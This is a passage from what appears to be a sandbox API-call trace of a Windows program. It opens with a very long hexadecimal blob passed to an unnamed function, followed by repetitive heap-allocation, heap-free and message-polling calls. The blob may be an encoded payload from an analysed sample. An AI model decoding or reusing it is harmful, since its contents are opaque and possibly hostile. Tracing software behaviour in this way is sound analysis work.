A1D73E2F5B4626508EDE6EB6F0367CFC06098D63D3649C7795B2D0DC67F5C82A88938F68C51B30E3AC0726493E91395232C80F59897A83B68A1FCD1C50DFE28991216DB2E39A03AEB117FF62E14ECDEAD7E4DCC7C3198EF01F35D641EBCA7ED920947DE74B6B2FC38387F499F7182C92FC3AB5E79F14B79E0445FBD0FF9EB43E7EB73264493E397CB1FD7F98BB4D0C27177912F27E45044FBABA2B8D425CAFCD5E871353EFA941471B64FAAF22D2E1ECBAA7AEC1FD72F7E0B0CEC98575AEB507A6C677F686052BAD00601A4A9CC7B20EF5C0F3F096339EA87E572EBC55E8D7686EA2F9586B2FDA0AE1D811B9D4BEC00D388DD97CFEFFA0B49FDE2DD74E9D8CC2FB1E2A2CD9B84DCC61E3CA07FA2099AA851BD91B3FA052044B62CFBA9D809AE7FD50E2A028CE607A860AF407A00F707FE0BFC6DC0A66C90E30AC1813611A74ACF4C28CABE85DEA79A9789B98E773B53ADAB9DDA7C892D3DF2C56076979F66260BFA10CAB03C5D28529D399F777F450E6372BDB9D332EFF044154D66E8845F6093928AEE8359FC70BDE4D48404270477BBFDC1FD5C8348A4991D858E55CBC3BFAE1C20547B0A36DF377AA84A28C0739129FB3323974F6C94D9E37F7C726ABC58C6291935B7C355785EDCE896B2DED41034C7AD8CB7155FF35A669DA6AF6B5FFBB7D22429ED2770A06E683C3DA5A6523A1162A893D2FBC4667B2B1AA9000A75BC500044BC67B5D5066AD75121695A55C5CAEEF3FB86BDFA4F8B3983299F4A7A470DC1CC3BFFA1DF81A202E406B8EAF8386079A7D5664D932F14D37452A80DFD1CF42BD46A00CED445A449D7BC81F0F827FEC4E1720DBFD706020039C6F0F36BC72710F56BAD7691780B8A36A9D205A4B314547C6EABD3C896732E340938708D59DC5B27A2F227AB0CB5BB685BDBED598132B87FC3B621EB193C1E4CFCAEDFF191E6D01C5C02CF0B2EC4CBBE76FE41C5A256EC82F13016BD6BF385959FD8D9EB23032CD015C33B792A7C50170416E908BBBF38CDB1636B794EA18C01F1206EA89C904D32D624A474D9B356A9928F74F72DC563796798D3770F5BC00078619037A734A52873CC9859A578783813372A70B5D70F964CD045062593ED3C13F4973A5A9C06784110F69654E65BE1ACBB6C437945C43AFA4FC00A1680C6E1CDDE9CFA6A8B4E6FC3BE45ABC389D29541990D557C73FD361384D4DD9FE5C2B0BD0D1D9C7235D644EDD376C3EA6B2B570D6F818F7A824F55FCEAB99750F1091E12DFD6EF799033A093D912024A4451D3D804EB5E3671395275480A556BC5160BDEBD5A4303A37C57EBC9ED4D5A86C099D908386D8C3524C64B49469A5F55C58A7FEE17A01AB6211925001326D60ACEBA69955B4161E3C1E627880C93AC215D7A3794F2C528B9326A32276B5F4DAA0D08AC69C62887B12733A13ED40EF456A6C805B7CA6939736F505176C1D72CB46EEF26B81BB5D137DB4298236C7F30AD08C9DD1543E60934CAD6B6F56BDC2E337A43EE36FE465F99F927F16A72EC8AA1348DCA4789C0CF4EFAFFA0F38763ABD3E0ED5065F6631F157154D3D50814460443857261265F587AC2AE60B140016ED71AAD4E40041E37C1159595B1AF03E234AAC152836EE014D0C5C128E31CB8943BF72BFA26F364F6104B9C8DDCF1D7AFC9462A135B74CF4634D4FE35BD0440AE50B1F271C135AD8C433BDB71FB370CB9E36E350EC65AFF2EB6DA48D232E9EDC4566A5B830B60D14474EB34255DBF96A98F8A29DEC535EC1A786FA819867CF938487B5EF4A7DB2F1D3A0A5DF67A3D79FF41AE032897EE4903745AD1E8E2A3281307BA6D969EF77FFA0D070E551524AD8654E7279EF0DFD7582F3D17D45C16E00B50215584F1BC1DD79C3F2C4A15EAB6D7C3E02B8E8F753AEB68E7408790BA8D21CBF3221E4C4A390A5C8CB5048D878EDB685F670993EE4B6A5C445FEB3B7938EEF25EA01019AE64E08B6AC56A7E0197FA39EA0FCE51F2A6481EE2C8B5D3C0A34F9A15C8C437CCCF5DADC5E38507E5977970E588E04D79F6CA6C22D7CB95D07EDA6BDC7B39E87191AF0178FE670CBFCB3AFBA5CDF6B68C3992E5BA60576DD0FBE7DFC863D02D304F536FB783D4D1422B3EFE5B2875F5FF33DA3926304DE1321A27C08D405B2702D069E60FA439E39A0DDA666CD30C0B531E8BCFA990C9F451A6975EEEE17B6118D48D2C515FC02E7CED5544858BE52431CB298864EA3B8C924B1B2AB42FCCB3E91DEC69DBE10043CAEBF85C82C9AF6FF7F75220C6137BF6C5291D732AEF23569453CB17F612D672ED364287A1CFBDE9B7922E69D7EDE303BB89EE0AE442527D040FD69301B5D1458C4ABAAE1A14C11ECB81D91F559C4A927939CE6221F6E4DD3721E0D5EF5C3B6B79EA2C73638157B297DFC1B016962FD4137ED8C742B5E42BCBE42336A031A8816057CCE7FAD82C34C2165F0F7E9F5DE273B04A371C829C6EF45C354C3553F207CE1551A60DE2A4010DF2359403988E0421214B591D285C8E006E32854923FACDC9D35B923C7931CC85877D98F5B66C521165A88EABDC5D3D4D83800DBFB5F52F208B028F25A445FD26DAD78C71C7FE20C84797ABE418D71528E0A168FC2A38B70344C29F215CBF232713D728C2539CB72399AA461E7A4EC91B8F0FA5D6ECF7D7590921C0203E6C89F872AAAAA65EBE48DF45A6B66574DC04D488C30B58ED205444ED7CD7AA9FD1302B7C04E23672FBD489B7C709242DBBB4EE28F1F6B95F313918F514AC84A805323B80B053F3D02898F9EDC2C66D76F28CEF114DC676112EAC63B2D55E869C0CF85D1FC1C7CCDB1F6E49D119D92D3FD94A7F1B161FE8B7AF7328A25933BD82F27354865279FD47447ABFB584BFE7B4B68B69AAC0D1D3A03D16C8DAA4884AE68F7C9A84EDA1BC81199B2D9C5C8EFFE276719A5230DEB3413746F21CD2178DB6C139D1A5DE860B7568D273B800B3615A0D6A79AC0D148AB05CB1715B55AF4FADBA72AFDF79CD31655CFC76C70BD4634973266FB8B29E7DF79F62DFE3F96F63F18E875F9EECD03AF81571FDA60063D535063AB4C98534A6EAEED2D61869434E7518F922FDCEF2FD8AB6A2169E2E6760BB7441BE465535BF5AD9DBBCA3E7FFB42520D276277B652928CB129EBE603D0809C9D9087F5611CF4C7469BA2010CAE6E797609631A8B517D635C0659282B377C48A35A92E47F6E06C027374BD13AB8D2E789AFBD0150DEC68FDA74C3C7BE412F9F407B5BDE77816238300EBD1E6AC6910277394A69E2CA7F09F6787C28422CEA8E9D5F567D1D43BA2434DA4679D650F64BB20FEEA14A176D8570F9E0972D497BEC81D9F98CE14C2DA0936549E766F829A194C4714FD5205D213A324C8A374C23CC61A9D90D15E9FFA6E2E7FE1EC60B86E388843F89FA5A729B4336251A4A233463744BC9551BE906E0AFF08AA4551B797985F80A6F349BC4581B38837A957F004D21ADD2221C16605F433CB0F552E03A643A448B415CDE0477FF0C1CBD29006B86DB44BA381983E0D4D1F776CB8785B07E498F1541B69ACF12186C02BE6F34C4C91AC096DF3ED90D6A021991507B43041084D8779C8EAA574D474746EAC2B6DCA2FB5B1600ED22176C14F11807F1A83F32A72190B8F13090A5375CD1C6B15D942B1AA65734D0D16F63429DDCBB4D2F422CDCB7ECACF54E7DAA14ABA8CA8A8710ED5C54A3B9A4C30066E864E37837FA001E4D9A6846FD18E8A51A34AF5F3BF500FC17AE13C0597DE5839B23A7950DF606551629C1CA8461975FEDADD528E956E28A18C08C6ABF738F6E5D3E43C2518A1438C15B5AF32FD3FD670D9CAC8E1FB084D3D93A5297A007922B26B45D1C9EEFE88B7110AD1AA7F87998052874FBA97BCEB98748251F89C52181F3F3F63364BDA138A5361B0F191D0D35F68CF3FEC8FF4979DABE42291CD1C147CD875CC78C9C4BC45D791CE18C41FC5B5F87E3315FCD52E071963082F8DBE20B46A8EFE88D115D59F8ED0CBE1AD6F2144188525D8B32DD26238B9571F1134730B10AAE9546C707962C87BEC770CCB58D6DAAD2104B6F9650010A762BF8A5C71B3CF56957228121FCD2621B2F7CC1FF838ACDBA85B8CB3EFEA06FEE07DE544A0AB361302631196051A45C44CA9B1123700F1DBD43D4D1B39B24C5C24B85114A0C4E40A59D4CE5218789F0A241F1907F914756A3C750E75DAC0C3FBB56FC3E1DCB67B9CC269ACFDB7424403F4B355E7FD24BEF824CD58F483FF6E69FA05D20D3E8C8EE3427F33C68FF6B8505B065A1865F221A574CE1994C4BAE66B3A2DB12DC1135F345452402C643B20B797563CEE8AC0C54990F60BD70C4E0BC09AF75499C2696D438909C00A17AE882416E2852400AE66E4F4A631DE4F58711BB2C8C2BEE8209691A80DD9844BB5A688537A91337D3757B14EECB6C04C69DE7E0CFC7012FC3C50ACE0C08C8617F769F908759D4554A9DFE6CEF2CAA9C4C0A4AE6A704B46DF420726919927AA808B3B1C009FD1C580265F4F62359069B3818E97C46986E5AC16BDDB030C1FE5489FB6030F55923A312337802CBD653F37F76D240DB9749EC7B6001080086C34D1355D19B53D5A86125411DEDA1F1FB92E48A6B52BF718D3CDBFADA22E26C9FF44079FE952C73D83F265D4637ADD4144DC6B6F1655E9E2CF4A1DA35F95402755060E8A6560EF4D3AF0CC5DF883FFCC1234FA01279C411F328D1EBFBB24EAB9334BF7F5CA78456C0005DBAAB1F11914E67535E30060B12091DCECA742225B3071E9E1159DFC16C8CF4C76A72A50C1E0F427CBE52CC2E9017BABAB4DE0751D62BA5A151D5511B430A713D73F23E1F4CCF43F391DED9F66AF65A84FB6828DFB25C1CB26FA450364D86CA48CB374D13881F2BCD0B34F2AA68099DD638AF3B8FBC23FEF8D621AB6F1782C42CDFB2A9F7E77616335F65F71E58677CA525BF990A297882EE5DF561F2BC926988E109BF7FD0C76A40F945FBC5CAF34280DBF56EB9C87BD2D4B9235B4578BE1C869D0D75C874D2FF3F230A1B6254DE9B301442592AC1931C552C01DDB73C4E28C021E5047521BDD322ED23BCF0B3E6FF6712D063260B894DD5AC0BC739128C3DFFC12AE0818C50940D073617151DAA64E8682618D2FC8F48189B64F19F00CFBF12F69BE79E449B47447565D5E900823B6BB91BE419012F00E68C64F7B7D07A85CC9D7FB88D79FBB04E8ACBA6497B08F97F0BB721774D3905D14ADE474F7FF619A9F7E6700BBA82BA8DEAA8275D25222AFDFE67E350DDF46BDEDEC18F6E2B3D5091F1A2FD1F393A1DE7AC4B2359A59A23B98A0593CEC267E8061A81171C8C709046968151BF79CEBB34051E055202CB68A200CA1878D8EAFD83A55A1E60323EE5925F8265DB2BFBFA81149D8AA9079E452FA3966217EF0FCF3CDBD5988568A248522A91D209861145CF6A4BEBC56CD0AF195E989DCB758835831109FE9E09D75CD42225049EC6D6F7760579C7B684BF8EC31F9B3EECF65941B8BF65D507FD8E0D53C95855F48A12DB097365DFC9C98C5AF7C231D0B38EA7990DEBF8B891AA9F5B2D7D4B980625EB80608A60E29470A2FC40584C3BC2075574992A7F83FFB3E48E741D73C644607D122E5DFF8F5BB79C43C6368AA5732F6E6C813A7521F603557237283FF9D80B810E8AB02E4C05F2E7BF773538D9EFBCB7534DC5BFA352E7DA5513C50BF8CE26EA4F187B07D701A7769AE465F5FDB7F8942C2BA3DD4CFA222E9A8D1E77DA4BBDCAFCE3CB721A12056CFE3398241870EE8C45557CCADBDC638EABB4D7501E279666ADF390B462472657E66CB8BD250A9D7B71FA0259FE15B2B30C5AA4C9BC1F20FD9F8E3767694D3D4265568058D43A9317FAF3A87A2065714EA472D5B14F0907699C0099AE4E0F560D50625F266BD95FBC413F5F5150276E6FF255FC57363488ECC92714DAF5098AFA9D8F7BEA426109473249CB348B0A6AFE3D94E8E370BE4FAF58CCA18BF9D3C7FF327EC6A60ABCE4DCF805EEF55CF53ED016E244C4EB39F96871CC462E5E2FBF2CD3DDF94C8E5431B78EB36DDA1078A71BE53C66CDB09F9773A9B479A7C65CAF784E0EEC6256B6A20C7F64B32A638A525B1E0454EB3DEFBE4E3FEB95D1625FDA516F7ED6FCBA23F8342BED647924B74588E579615FF49CDC6C792B5AD9BD0D8ACC21F141E0E24714E8DDB454BFC0790B9D89214A2A08CEFBAFB0DD73A9C4BF328FEB8C21E7782617A997B072C1973C7A3F75794A5CE0EE92585BC86EADF4D55B620492A06CFC2977AFEFF228EE4C6D3768F2E3281BAC44B50E865B507F148C79107CBD497B0324AFF6EE52035B2CB04A89A133E8232D51173F3AD10F0091505108771701930B0AF517031134BF9B5D7A25892F1EF200D763416874384C3B01B11FDF8B1B1605C38E5C34684BB867A447EAB7FEFF75F062926021383418A6510352694E964993BE495705B00B496922722F33A2ECA7B1371BD9B5A228BEBA3813449A625C847C40EB7A3595902790F1E6EECC9A72EB08785C3369E3F943CEBA0837AB520E0FB6E03F2DD2F1208E15FD678EF9236EDABC4CFE4FE20F5AEA39958AEB3E8E761B97018DAEE787496533FD52E6C6D09A299E571F5F1DFB8CE646855A4AC455E961618B5CAAC1204075F117D3E7A2C4CE9E0C225CBA1859C05B08BCDED2ACA667831C534FC0BFAE09D1AA0481EEB4282F9B6BB87EBAEE80F1DDFBCD6AB5D8D58ADB990B8F192D1D6D8916C02DC44E0A3760BCFEDAF30842F1F3E73A6C5312274023A9B371C47553CC0B818F7092E49CADBD616272BB4C404B513CD892C6F44EE5480A1A931817460F2082C99820974EBFC825A0A44EEBE36AC16A4012D7FFF37355EC101050DFF81B577B596C9F535C4A267DA442097F03FF03B1A2876E1CB8E6D82D7966600C5338737B6C0C106A90AA8D0162502CCE5A0420071FD3CF7B90BD5F520EEEB06C1CB0085EF7674026BB309012F3BB0733FD58C2517CD045DBC152F72703F0A5E8CA138E2925A3ABA52B48B5D2EA30675D4EB17C524714D880BE31EC8CEF294545B2CFA1459404E7465C603FBD28D54313406BE0B4046604455B6F35CD37C5F8191CADDBCA9E5BB0674ECF9DEB0A0DCBB8A036EFE7CB9C6567D2053FCF452D9A82F0BC315F58116B5682E146F846959D8124AC1F042C6066D92AC4119F6E67628DCE7319F2ABE06AEF7CDDEC6E6C777E07960FFB00D2D45D3217E64CB43C7742DFEF7E4FE5E8CB8EFB39D04B1A3DAB86D966565") returned 230435 [0119.969] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1611c40 | out: hHeap=0x12c0000) returned 1 [0119.972] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0119.972] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1568fc0 | out: hHeap=0x12c0000) returned 1 [0119.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0119.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1530b90 | out: hHeap=0x12c0000) returned 1 [0119.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0119.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0119.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0119.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14f83e0 | out: hHeap=0x12c0000) returned 1 [0119.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0119.978] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef590 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0119.978] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.978] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0119.978] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0119.978] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.978] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0119.979] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.979] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0119.979] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.979] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d98 [0119.980] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d98 | out: hHeap=0x12c0000) returned 1 [0119.980] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f98 [0119.980] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f98 | out: hHeap=0x12c0000) returned 1 [0119.980] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0119.980] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0119.980] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0119.981] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0119.981] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c18 [0119.981] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c18 | out: hHeap=0x12c0000) returned 1 [0119.981] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0119.981] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0119.982] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef590 | out: hHeap=0x12c0000) returned 1 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0119.982] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0119.982] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef590 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0119.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 